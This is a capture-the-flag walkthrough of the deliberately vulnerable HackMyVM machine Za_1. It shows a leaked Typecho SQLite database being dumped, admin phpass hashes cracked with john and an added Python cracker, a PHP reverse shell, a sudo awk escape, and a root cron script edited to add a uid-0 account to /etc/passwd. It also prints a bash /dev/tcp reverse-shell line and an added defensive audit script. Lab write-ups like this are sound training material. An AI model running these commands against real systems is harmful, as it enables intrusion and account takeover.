hack-my-vm:Za_1

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.29                                                                                                           [18:01:55]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 18:02 CST
Nmap scan report for 192.168.1.29
Host is up (0.0024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:1E:E9:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds

Attacking port 80

kali@kali [~] ➜  gobuster  dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.29               [18:02:21]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.29
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 312] [--> http://192.168.1.29/admin/]
/install (Status: 301) [Size: 314] [--> http://192.168.1.29/install/]
/sql (Status: 301) [Size: 310] [--> http://192.168.1.29/sql/]
/var (Status: 301) [Size: 310] [--> http://192.168.1.29/var/]
/usr (Status: 301) [Size: 310] [--> http://192.168.1.29/usr/]
/server-status (Status: 403) [Size: 277]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

The site is a blog and /admin is its login page. Instead of testing it for SQL injection, the other directories were checked for leaked files first, and /sql turned out to contain a leftover SQL dump:

kali@kali [~] ➜  wget http://192.168.1.29/sql/new.sql                                                                                       [18:07:25]
--2025-01-21 18:07:50-- http://192.168.1.29/sql/new.sql
Connecting to 192.168.1.29:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 102400 (100K) [application/x-sql]
Saving to: 'new.sql'

new.sql 100%[========================================================================>] 100.00K --.-KB/s in 0.003s

2025-01-21 18:07:50 (33.9 MB/s) - 'new.sql' saved [102400/102400]

Download and inspect the file: despite the .sql name it is not a text dump but a SQLite database, and its header gives the format version away. Open it with sqlite3 and query it directly:

kali@kali [~] ➜  sqlite3 new.sql                                                                                                                 [18:12:08]
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
typechocomments typechometas typechousers
typechocontents typechooptions
typechofields typechorelationships
sqlite> select * from typechocomments;
1|1|1690361071|Typecho|0|1||https://typecho.org|127.0.0.1|Typecho 1.2.1|欢迎加入 Typecho 大家族|comment|approved|0
sqlite> select * from typechometas;
1|默认分类|default|category|只是一个默认分类|1|0|0
sqlite> select * from typechousers;
1|zacarx|$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.|zacarx@qq.com|http://www.zacarx.com|zacarx|1690361071|1692694072|1690364323|administrator|9ceb10d83b32879076c132c6b6712318
2|admin|$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0|admin@11.com||admin|1690364171|1690365357|1690364540|administrator|5664b205a3c088256fdc807791061a18
sqlite>

This exposes the password hashes of both administrator accounts in typechousers (the comments table also records the application version, Typecho 1.2.1). The hashes are phpass portable hashes ($P$, 8192 MD5 iterations here), a format john recognises on its own. Save one hash to a text file, here simply named x, and run it against rockyou:

kali@kali [~] ➜  john -w=/usr/share/wordlists/rockyou.txt x                                                                                      [18:21:03]
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456 (?)
1g 0:00:00:00 DONE (2025-01-21 18:21) 50.00g/s 19200p/s 19200c/s 19200C/s 123456..michael1
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
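To see what john is actually doing with a $P$ hash, the following is an added example (not from the writeup) that reimplements phpass verification and a small dictionary attack in Python. The two hashes are the ones dumped from typechousers above; the wordlist is a constructed stand-in for rockyou.txt, and since the writeup does not say which of the two hashes its john run cracked, the demo just reports whichever one matches.

```python
"""phpass ($P$) hash verification and dictionary attack, added example.

The format john reported above (phpass, iteration count 8192) is:
  $P$ + cost char + 8-char salt + 22 chars of phpass' own base64 variant,
where the digest is md5(salt + pw) followed by `cost` rounds of md5(h + pw).
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' base64 variant (not RFC 4648): 6-bit groups, low bits first."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_cost(setting: str) -> int:
    """Iteration count encoded in the 4th character: 'B' is index 13 -> 2**13."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad cost character")
    return 1 << count_log2


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the hash for `password` under the cost/salt in `setting`."""
    count = phpass_cost(setting)
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


def crack(stored: str, candidates) -> "str | None":
    """First candidate that verifies, or None (about 8192 MD5 calls per try)."""
    for word in candidates:
        if phpass_verify(word, stored):
            return word
    return None


# Hashes exactly as dumped from typechousers in the writeup.
DUMPED = {
    "zacarx": "$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.",
    "admin": "$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0",
}
# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "123456", "admin", "zacarx", "typecho"]

if __name__ == "__main__":
    for user, stored in DUMPED.items():
        print(f"{user}: cost={phpass_cost(stored)} cracked={crack(stored, WORDLIST)}")
```

The salt is stored in the clear and the cost is only 8192 MD5 rounds, which is why a short wordlist goes through in well under a second and why john reported the result instantly; a leaked Typecho database is effectively a leaked password list for any user with a weak password.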

It is a weak password, so the cracking felt like wasted effort. Log into the backend with it and upload a PHP file that connects back to the attacker; the upload lands under /usr/uploads/2025/01/, which is where the shell below starts.

Add php to the allowed upload file types in the backend settings first, otherwise the upload is rejected.

Listen on a port and catch the reverse shell:

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [18:28:46]
listening on [any] 8888 ...
connect to [192.168.1.4] from (UNKNOWN) [192.168.1.29] 56010
bash: cannot set terminal process group (1256): Inappropriate ioctl for device
bash: no job control in this shell
www-data@za_1:/var/www/html/usr/uploads/2025/01$ whoami
whoami
www-data
www-data@za_1:/var/www/html/usr/uploads/2025/01$

Privilege escalation

www-data@za_1:/var/www/html/usr/uploads/2025/01$ sudo -l
sudo -l
Matching Defaults entries for www-data on za_1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on za_1:
(za_1) NOPASSWD: /usr/bin/awk
www-data@za_1:/var/www/html/usr/uploads/2025/01$

www-data may run /usr/bin/awk as za_1 through sudo without a password. awk's system() runs arbitrary commands, so it yields a shell as za_1 directly:

www-data@za_1:/var/www/html/usr/uploads/2025/01$ sudo -u za_1 /usr/bin/awk 'BEGIN {system("/bin/sh")}'
<do -u za_1 /usr/bin/awk 'BEGIN {system("/bin/sh")}'
id
uid=1000(za_1) gid=1000(za_1) groups=1000(za_1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
whoami
za_1

The resulting shell is barely interactive, so write the Kali public key into za_1's authorized_keys and connect over SSH instead (note that > overwrites the existing authorized_keys; >> would have kept its previous contents):

cd /home/za_1
cd .ssh
ls
authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCV6dTFnRnxSXTQ7EI7Bymfl/xRBCjpIzxswsIemipSdaNGMhfVeGHj9cHsnmouJ7s6KmeO5tElGpePQRO4sHILOVAQ2hEwnu1iGklDNwTKAusQqf2yxfVvvZWfWqEa3x2cV0JOGqKKVWNpof+UwIUsbR9Ka6K2WGyMa/Y7JootilSNkpxK8NOF5FjJeu8iYGAz3u7N0DP4S6YAg0XkNSQ0kkknBCLMJboryf52EohsqY0PS3mSMs9v0MBqnvcgcd7uPjzmth3P54rkJpz6/Qt5+wC//+XnQwxL9VlJsSHxx6SDn//4d/nlMG4Xa1p5yce2qHvHXV7HbXOmj5he3Av1h8S7dukdBGYGqgdFxJ2vkqv/tZzreSqKlHoR8SqsA3IUFXMnK9pr7pwThFVy9FdpQ91AuzQ0gLejm/x9EpvOoEluBdU2Sm4mue3uj2NvS0XXqlJy/KKVotymaEzeRSRMUU0zeNf9bJ0II+DjJ0+iti0XQ69T2CW4n6tFebXpXgB18qJd54zFEJoykcq7pUoclHL88+rQwhYDhjCiBhs4VOUKuLQjf3jqqGsFrC4PJ8oIfoOBnxoDXZWdh6Ly0zzC/BD2/R2OuPPuzv6XAaqF958SgI681bk5SXeTnBXAn7p8r+gIONnr+QI4evvZgh8CyWMY+v/fJO1tbIXzK/TqbQ== your_email@example.com'> authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCV6dTFnRnxSXTQ7EI7Bymfl/xRBCjpIzxswsIemipSdaNGMhfVeGHj9cHsnmouJ7s6KmeO5tElGpePQRO4sHILOVAQ2hEwnu1iGklDNwTKAusQqf2yxfVvvZWfWqEa3x2cV0JOGqKKVWNpof+UwIUsbR9Ka6K2WGyMa/Y7JootilSNkpxK8NOF5FjJeu8iYGAz3u7N0DP4S6YAg0XkNSQ0kkknBCLMJboryf52EohsqY0PS3mSMs9v0MBqnvcgcd7uPjzmth3P54rkJpz6/Qt5+wC//+XnQwxL9VlJsSHxx6SDn//4d/nlMG4Xa1p5yce2qHvHXV7HbXOmj5he3Av1h8S7dukdBGYGqgdFxJ2vkqv/tZzreSqKlHoR8SqsA3IUFXMnK9pr7pwThFVy9FdpQ91AuzQ0gLejm/x9EpvOoEluBdU2Sm4mue3uj2NvS0XXqlJy/KKVotymaEzeRSRMUU0zeNf9bJ0II+DjJ0+iti0XQ69T2CW4n6tFebXpXgB18qJd54zFEJoykcq7pUoclHL88+rQwhYDhjCiBhs4VOUKuLQjf3jqqGsFrC4PJ8oIfoOBnxoDXZWdh6Ly0zzC/BD2/R2OuPPuzv6XAaqF958SgI681bk5SXeTnBXAn7p8r+gIONnr+QI4evvZgh8CyWMY+v/fJO1tbIXzK/TqbQ== your_email@example.com

Connect over SSH

kali@kali [~] ➜  ssh za_1@192.168.1.29                                                                                                           [18:36:07]
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ED25519 key fingerprint is SHA256:oSJ0TcpNx9A3oiP98T03MZQ2oihLUNvFsNtehmlqYug.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:13: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.29' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Jan 21 10:36:12 UTC 2025

System load: 0.0 Processes: 108
Usage of /: 21.4% of 19.52GB Users logged in: 0
Memory usage: 19% IP address for enp0s3: 192.168.1.29
Swap usage: 0%

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

41 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


Last login: Wed Jul 26 07:19:41 2023 from 10.0.2.18
za_1@za_1:~$ ls
user.txt
za_1@za_1:~$

Check the user's home directory for sensitive information:

za_1@za_1:~$ ls -la
total 44
drwxr-xr-x 6 za_1 za_1 4096 Aug 22 2023 .
drwxr-xr-x 3 root root 4096 Jul 26 2023 ..
lrwxrwxrwx 1 za_1 za_1 9 Aug 22 2023 .bash_history -> /dev/null
-rw-r--r-- 1 za_1 za_1 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 za_1 za_1 3771 Apr 4 2018 .bashrc
drwx------ 2 za_1 za_1 4096 Jul 26 2023 .cache
drwx------ 3 za_1 za_1 4096 Jul 26 2023 .gnupg
-rw-r--r-- 1 za_1 za_1 807 Apr 4 2018 .profile
drwxr-xr-x 2 za_1 za_1 4096 Jul 26 2023 .root
drwx------ 2 za_1 za_1 4096 Jul 26 2023 .ssh
-rw-r--r-- 1 za_1 za_1 0 Jul 26 2023 .sudo_as_admin_successful
-rw-r--r-- 1 za_1 za_1 23 Jul 26 2023 user.txt
-rw------- 1 za_1 za_1 991 Jul 26 2023 .viminfo
za_1@za_1:~$ cd .root/
za_1@za_1:~/.root$ ls -la
total 12
drwxr-xr-x 2 za_1 za_1 4096 Jul 26 2023 .
drwxr-xr-x 6 za_1 za_1 4096 Aug 22 2023 ..
-rwxrwxrwx 1 root root 117 Jul 26 2023 back.sh
za_1@za_1:~/.root$ cat back.sh
#!/bin/bash


cp /var/www/html/usr/64c0dcaf26f51.db /var/www/html/sql/new.sql

bash -i >&/dev/tcp/10.0.2.18/999 0>&1

The hidden .root directory holds back.sh, a script owned by root but world-writable (mode 777). It is not SUID/SGID, so it presumably runs from a scheduled task. Its contents also explain the leak found earlier: it copies the live Typecho SQLite database into the web root as /sql/new.sql, then tries to open a reverse shell to 10.0.2.18:999. Run pspy64 to confirm who executes it and when:

za_1@za_1:~/.root$ cd /tmp/
za_1@za_1:/tmp$ wget http://192.168.1.4:8000/pspy64
--2025-01-21 10:42:18-- http://192.168.1.4:8000/pspy64
Connecting to 192.168.1.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[============================================================================>] 2.96M --.-KB/s in 0.07s

2025-01-21 10:42:18 (43.3 MB/s) - ‘pspy64’ saved [3104768/3104768]

za_1@za_1:/tmp$ chmod +x pspy64
za_1@za_1:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
2025/01/21 10:42:38 CMD: UID=1000 PID=2825 | ./pspy64
2025/01/21 10:42:38 CMD: UID=0 PID=2820 | /bin/bash /home/za_1/.root/back.sh
2025/01/21 10:42:38 CMD: UID=0 PID=2818 | /bin/bash /home/za_1/.root/back.sh
2025/01/21 10:42:38 CMD: UID=0 PID=2817 | /bin/sh -c /bin/bash /home/za_1/.root/back.sh
2025/01/21 10:42:38 CMD: UID=0 PID=2815 | /usr/sbin/CRON -f
2025/01/21 10:42:38 CMD: UID=0 PID=2812 | /bin/bash /home/za_1/.root/back.sh
2025/01/21 10:42:38 CMD: UID=0 PID=2810 | /bin/bash /home/za_1/.root/back.sh
2025/01/21 10:42:38 CMD: UID=0 PID=2809 | /bin/sh -c /bin/bash /home/za_1/.root/back.sh
2025/01/21 10:42:38 CMD: UID=0 PID=2808 | /usr/sbin/CRON -f

pspy shows CRON running the script as UID 0, so it is indeed a root scheduled task, and anything appended to it runs as root. Append chmod 777 /etc/passwd, wait for the next run, check that /etc/passwd has become world-writable, then add a new uid-0 user to it. The hash for the new entry comes from openssl passwd (traditional crypt); placing it in the second field makes the entry self-contained, so /etc/shadow is never consulted. One caveat: the appended line sits after the reverse-shell line, which presumably fails here (nothing listens at 10.0.2.18) without aborting the script, so the chmod still runs, possibly after a delay; putting the command before that line avoids the wait.

za_1@za_1:/tmp$ cd /home/za_1/.root/
za_1@za_1:~/.root$ nano back.sh
za_1@za_1:~/.root$ cat back.sh
#!/bin/bash


cp /var/www/html/usr/64c0dcaf26f51.db /var/www/html/sql/new.sql

bash -i >&/dev/tcp/10.0.2.18/999 0>&1

chmod 777 /etc/passwd
za_1@za_1:~/.root$ ls -la /etc/passwd
-rwxrwxrwx 1 root root 1613 Jul 26 2023 /etc/passwd
za_1@za_1:~/.root$ openssl passwd 123
I2HY8i2gi7MFE
za_1@za_1:~/.root$ nano /etc/passwd
za_1@za_1:~/.root$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
za_1:x:1000:1000:Zacarx:/home/za_1:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
sunrt:I2HY8i2gi7MFE:0:0:root:/root:/bin/bash
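Seen from the defender's side, the whole chain above rests on two misconfigurations: a root cron job that executes a file non-root users can modify, and an /etc/passwd that has been made world-writable and now carries a second uid-0 account with its hash inline. The following is an added example (not part of the writeup) that reproduces both findings as audit checks over constructed input. The file modes, owners and passwd rows are taken from what the writeup prints; the crontab schedule is an assumption, since pspy only shows the command line.

```python
"""Audit checks for the root cron / writable-script / passwd-tampering chain.

Added example. The crontab, ls lines and passwd excerpt below are constructed
from what the writeup shows (schedule assumed, paths as printed there).
"""
import os

# Constructed root crontab: schedule assumed, command taken from pspy output.
ROOT_CRONTAB = """\
# m h dom mon dow command
* * * * * /bin/bash /home/za_1/.root/back.sh
"""

# Constructed `ls -ld`-style lines with the modes and owners shown above.
LS_OUTPUT = """\
drwxr-xr-x 2 za_1 za_1 4096 Jul 26 2023 /home/za_1/.root
-rwxrwxrwx 1 root root 117 Jul 26 2023 /home/za_1/.root/back.sh
-rwxrwxrwx 1 root root 1613 Jul 26 2023 /etc/passwd
-rw-r----- 1 root shadow 1000 Jul 26 2023 /etc/shadow
"""

# Constructed /etc/passwd excerpt ending with the entry the writeup adds.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
za_1:x:1000:1000:Zacarx:/home/za_1:/bin/bash
sunrt:I2HY8i2gi7MFE:0:0:root:/root:/bin/bash
"""


def cron_script_paths(crontab_text):
    """Absolute paths referenced by each cron command (schedule fields skipped)."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        paths.extend(tok for tok in fields[5].split() if tok.startswith("/"))
    return paths


def parse_ls(ls_text):
    """Map path -> (10-char mode string, owner) from ls -l style lines."""
    entries = {}
    for line in ls_text.splitlines():
        parts = line.split()
        if len(parts) >= 9:
            entries[parts[-1]] = (parts[0], parts[2])
    return entries


def others_can_write(mode, owner):
    """Group or other write bit set, or the file is not owned by root at all."""
    return owner != "root" or mode[5] == "w" or mode[8] == "w"


def writable_root_cron_scripts(crontab_text, entries):
    """Cron-executed paths a non-root user could edit or replace, with reasons."""
    findings = []
    for path in cron_script_paths(crontab_text):
        if path not in entries:
            continue
        reasons = []
        mode, owner = entries[path]
        if others_can_write(mode, owner):
            reasons.append(f"file is {mode} {owner}")
        parent = entries.get(os.path.dirname(path))
        if parent and others_can_write(*parent):
            # a writable parent directory lets the user delete and recreate the script
            reasons.append(f"directory is {parent[0]} {parent[1]}")
        if reasons:
            findings.append((path, "; ".join(reasons)))
    return findings


def world_writable(entries, path):
    """True when the 'other' write bit is set on the given path."""
    mode, _owner = entries[path]
    return mode[8] == "w"


def audit_passwd(passwd_text):
    """Extra uid-0 accounts, and hashes kept in passwd instead of shadow."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((name, "second uid-0 account"))
        if pw not in ("x", "*", "") and not pw.startswith("!"):
            findings.append((name, "password hash stored in /etc/passwd"))
    return findings


if __name__ == "__main__":
    ls = parse_ls(LS_OUTPUT)
    for path, why in writable_root_cron_scripts(ROOT_CRONTAB, ls):
        print(f"[cron] {path}: {why}")
    if world_writable(ls, "/etc/passwd"):
        print("[passwd] /etc/passwd is world-writable")
    for name, why in audit_passwd(PASSWD):
        print(f"[passwd] {name}: {why}")
```

Two details are worth noting. Even if back.sh itself were 755 root-owned, the check would still fire because its parent directory belongs to za_1, who can delete and recreate the file; and the passwd check flags the sunrt entry twice, once for the duplicate uid 0 and once for the inline crypt hash, which is exactly the pair of anomalies a `pwck`-style baseline comparison should raise after this kind of tampering.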

Switch to the new user to get root

za_1@za_1:~/.root$ su - sunrt
Password:
root@za_1:~# whoami
root
root@za_1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@za_1:~#